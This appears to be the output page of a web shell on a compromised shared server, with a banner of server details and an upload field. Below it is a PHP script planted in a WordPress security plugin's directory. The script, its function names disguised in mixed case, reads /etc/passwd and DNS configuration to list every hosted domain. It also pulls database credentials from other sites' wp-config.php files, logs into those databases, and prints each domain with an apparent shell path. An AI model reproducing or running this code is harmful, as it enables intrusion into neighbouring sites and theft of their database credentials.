| Server IP : 184.154.167.98 / Your IP : 18.222.98.91 Web Server : Apache System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 User : puertode ( 1767) PHP Version : 7.2.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/puertode/public_html/wordpress/wp-content/plugins/malcare/ |
Upload File : |
<?php
function GeT_D0MaIn_wiTh_SuB(&$unique_domains){
$domain_lines = @scandir("/etc/valiases/");
if($domain_lines){
$domain_lines = array_diff($domain_lines, array('..', '.'));
foreach ($domain_lines as $ec_domain) {
$useridofdomain = @fileowner('/etc/valiases/'.$ec_domain);
if($useridofdomain){
if($useridofdomain == posix_geteuid()){
$unique_domains[$ec_domain] = true;
}
}
}
}
}
function Cl4WGetDomains($state = false){
$state = "named.conf";
$lines = array();
if(file_get_contents('/etc/named.conf')){
$lines = explode("\n", file_get_contents('/etc/named.conf'));
}
if(!$lines){
$lines = @scandir("/etc/valiases/");
if($lines){
$lines = array_diff($lines, array('..', '.'));
}
$state = "valiases";
if(!$lines){
$lines = @scandir("/var/named");
if($lines){
$lines = array_diff($lines, array('..', '.'));
}
$state = "named";
if(!$lines && $state){
if(file_get_contents('/etc/passwd')){
$lines = explode("\n", file_get_contents('/etc/passwd'));
$state = "passwd";
}
}
}
}
return array("lines" => $lines, "state" => $state);
}
function GeTdOmaInFrOmId(&$unique_domains){
if(file_exists("/etc/valiases/")) {
$grabdomain_array = Cl4WGetDomains();
$grabdomain_lines = $grabdomain_array["lines"];
$grabdomain_state = $grabdomain_array["state"];
$all_domains = [];
foreach ($grabdomain_lines as $grabdomain_line) {
if($grabdomain_state == "named.conf"){
if(@strstr($grabdomain_line, 'zone')){
preg_match_all('#zone "(.*)"#',$grabdomain_line, $data);
$domain = $data[1][0];
$unique_domains[$domain] = true;
}
} elseif($grabdomain_state == "valiases") {
$unique_domains[$grabdomain_line] = true;
} elseif($grabdomain_state == "named") {
$domain = @rtrim($grabdomain_line, ".db");
$unique_domains[$domain] = true;
}
}
}
}
function url_from_wp_config($filename, &$unique_domains){
$configdata = @file_get_contents($filename);
if ($configdata){
preg_match_all("#'DB_HOST',.*'(.*?)'#", $configdata, $host);
foreach($host[1] as $don){ $localhost = $don; }
preg_match_all("#'DB_USER',.*'(.*?)'#", $configdata, $user);
foreach($user[1] as $done1){ $username = $done1; }
preg_match_all("#'DB_PASSWORD',.*'(.*?)'#", $configdata, $pass);
foreach($pass[1] as $done){ $password = $done; }
preg_match_all("#'DB_NAME',.*'(.*?)'#", $configdata, $name);
foreach($name[1] as $done2){ $database = $done2; }
preg_match_all("#$table_prefix.*=.*'(.*?)'#", $configdata, $prefixarr);
foreach($prefixarr[1] as $done3){ $prefix = $done3; }
if ($localhost && $password && $username && $database && $prefix) {
$conn=@mysqli_connect($localhost,$username,$password,$database);
if($conn){
$site_query = mysqli_query($conn, "select * from " . $prefix . "options where option_name='siteurl'");
while ($siteurl = mysqli_fetch_array($site_query)) {
$site_url = $siteurl['option_value'];
$domain = parse_url($site_url, PHP_URL_HOST);
$unique_domains[$domain] = true;
}
}
}
}
}
function check_directory_for_domain($full_directory, &$unique_domains) {
if (file_exists($full_directory)){
if (is_dir($full_directory)){
$all_scanned_folder = @array_diff(@scandir($full_directory), array('..', '.'));
foreach ($all_scanned_folder as $each_scanned_folder) {
$new_folder_dir = $full_directory . '/' . $each_scanned_folder;
if (is_dir($new_folder_dir)){
$config_file_path = $new_folder_dir . '/wp-config.php';
if (is_file($config_file_path)){
url_from_wp_config($config_file_path, $unique_domains);
}
}
}
}
}
}
function get_domain_from_dir(&$unique_domains){
$c_directory = explode('/', $_SERVER['DOCUMENT_ROOT']."/");
foreach ($c_directory as $posnum => $each_folder) {
if ($posnum > 2 ) {
$new_dir = implode("/" , array_slice($c_directory, 0, $posnum));
check_directory_for_domain($new_dir, $unique_domains);
}
}
}
$unique_domains = [];
// Gather all domains
get_domain_from_dir($unique_domains);
GeTdOmaInFrOmId($unique_domains);
GeT_D0MaIn_wiTh_SuB($unique_domains);
// Output the results
$domain_count = count($unique_domains);
echo "<h1 style='color: green;'>{$domain_count} DOMAINS FOUND</h1>";
foreach ($unique_domains as $domain => $value) {
echo "<b>{$domain}/rex/index.php</b><br>";
}
?>